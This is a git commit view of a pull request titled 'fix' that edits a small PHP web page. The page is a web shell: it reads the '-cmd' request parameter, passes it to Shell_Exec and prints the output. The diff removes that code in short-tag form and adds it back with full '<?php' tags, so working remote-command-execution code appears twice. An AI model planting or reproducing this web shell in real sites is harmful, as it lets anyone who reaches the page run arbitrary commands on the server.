Merge pull request #8 from maggick/patch-1

fix
This commit is contained in:
Levon 'noptrix' Kayan 2017-07-02 10:22:31 +02:00 committed by GitHub
commit aefab61d18

View file

@ -10,9 +10,9 @@
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<? $cmd = $_REQUEST["-cmd"];?>
<? if($cmd != "") print Shell_Exec($cmd);?>
</pre>
</form>
<?php $cmd = $_REQUEST["-cmd"];?>
<?php if($cmd != "") print Shell_Exec($cmd);?>
</body>
</html
</html>